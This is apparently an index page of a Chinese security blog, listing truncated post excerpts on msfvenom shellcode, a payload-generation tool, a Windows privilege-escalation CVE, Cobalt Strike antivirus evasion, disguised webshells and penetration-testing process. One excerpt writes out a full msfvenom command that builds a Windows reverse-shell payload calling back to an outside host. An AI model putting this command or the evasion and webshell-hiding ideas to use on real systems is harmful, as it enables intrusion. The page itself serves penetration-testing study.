2020年2月21日
MSFVENOM SHELLCODE生成备忘录
摘要: MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Wind 阅读全文
posted @ 2020-02-21 20:28 GGbigboy 阅读(610) 评论(0) 推荐(1)
Axer-使用Msfvenom自动创建有效负载的工具
摘要: Axer-使用Msfvenom自动创建有效负载的工具 该axer将替换为有效的手动操作msfvenom,设置更容易和快了很多。 AXER可以让您选择平台,格式,编码器,与另一个文件绑定以及许多其他功能: 下载The-Axer https://github.com/ceh-tn/The-Axer 阅读全文
posted @ 2020-02-21 20:19 GGbigboy 阅读(214) 评论(0) 推荐(0)
CVE-2020-0668-Windows服务跟踪中的普通特权升级错误
摘要: CVE-2020-0668-Windows服务跟踪中的普通特权升级错误 在这里中,我将讨论在Windows Service跟踪中发现的任意文件移动漏洞。从我的测试来看,它影响了从Vista到10的所有Windows版本,但它可能更旧,因为XP中已经存在此功能。 服务跟踪是一项旧功能,我可以转换到Wi 阅读全文
posted @ 2020-02-21 18:17 GGbigboy 阅读(437) 评论(0) 推荐(0)
Cobalt Strike Bypassing Windows Defender 使用混淆处理
摘要: Cobalt Strike – Bypassing Windows Defender 混淆处理 对于所有红色团队成员来说,在交付有效的替代品同时又不拖延延展组织的所有风吹草动始终是一个挑战。就像所有其他安全解决方案一样,Windows Defender在检测由Cobalt Strike等工具生成的通 阅读全文
posted @ 2020-02-21 14:56 GGbigboy 阅读(878) 评论(0) 推荐(0)
Thinkphp 6.0 代码执行分析
该文被密码保护。 阅读全文
posted @ 2020-02-21 14:22 GGbigboy 阅读(8) 评论(0) 推荐(0)
2020年2月20日
隐藏Web Shell
摘要: 隐藏Webshell 阅读全文
posted @ 2020-02-20 18:11 GGbigboy 阅读(181) 评论(0) 推荐(0)
404 not found Webshell
摘要: 404 not found Webshell 克隆或下载项目: 安装 src/404.php文件应位于目标服务器上。 该服务器必须具有执行.php文件的能力。 这是服务器所在的一些最常见路由的示例: Windows (Xampp) Linux 现在,您可以通过浏览器访问它: 您可以替换服务器404错 阅读全文
posted @ 2020-02-20 18:07 GGbigboy 阅读(290) 评论(0) 推荐(0)
渗透测试流程
摘要: 渗透测试流程 ======================== From: 《Metasploit 渗透测试魔鬼训练营》 1.1.4 渗透测试过程环节 PTES 渗透测试执行标准是由安全业界多家领军企业技术专家所共同发起的,期望为企 业组织与安全服务提供商设计并制定用来实施渗透测试的通用描述准则。P 阅读全文
posted @ 2020-02-20 16:56 GGbigboy 阅读(338) 评论(0) 推荐(0)
apache/tomcat安装过程略
摘要: apache/tomcat安装过程略 一些变量 apache安装目录 apache配置文件 tomcat 安装目录 tomcat根目录 为tomcat添加项目,也就是配置tomcat根目录,修改$TOMCAT_PREFIX/conf/server.xml 在段添加Context,这里设置为/Data 阅读全文
posted @ 2020-02-20 16:43 GGbigboy 阅读(159) 评论(0) 推荐(0)
Load_file 常用路径
摘要: load_file 常用路径 WINDOWS下: LUNIX/UNIX 下: 转自:https://txf7.xyz/2017/07/20/loadfile/ 阅读全文
posted @ 2020-02-20 16:35 GGbigboy 阅读(441) 评论(0) 推荐(0)